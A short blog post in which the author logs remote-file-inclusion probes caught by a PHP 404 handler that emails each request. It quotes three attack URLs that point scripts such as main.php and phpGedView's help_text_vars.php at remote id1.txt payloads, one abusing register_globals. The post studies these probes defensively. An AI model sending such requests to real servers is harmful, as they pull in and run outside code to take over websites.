ErrorDocument 404 /404.php
Then I put this line into my 404.php:
mail('me@myserver.com',"$_SERVER[REQUEST_URI] file not found at mysite.com","Referred by: $_SERVER[HTTP_REFERER]\nREMOTE_ADDR: $_SERVER[REMOTE_ADDR]");What followed from there was a startling procession of mails showing me repeated waves of php injection and hijacking attacks. I intend to log interesting samples here:
2010 February 4
/main.php?page=http://qqe.ru/forum/Smileys/id1.txt?
This is apparently a random url sent in the hope that I may have a main.php file that will accept this remote page to display and do more mischief. I wager this is a signature vulnerability of some popular web software package.
//phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.inmonservicios.com//id1.txt???
I do have phpGedView installed at my site. This is apparently an attempt to take advantage of the php setting register_globals=on to set the phpGedView internal base directory variable to a remote site, then do some sort of command line and file mischief with php scripts at that remote site. This is probably a known vulnerability with some phpGedView set-ups. register_globals has long been recommended to be off, not on, due to this type of vulnerability. register_globals being on lets HTML GET and POST variables be registered as regular php global variables, which obviously can wreak havoc with the workings of your scripts. See wikibooks for a better explanation.
2010 February 11
//errors.php?error=http://www.cienciacompartida.org////id1.txt???
This one is guessing I have an errors.php file that will do something fun with the url they are providing.
No comments:
Post a Comment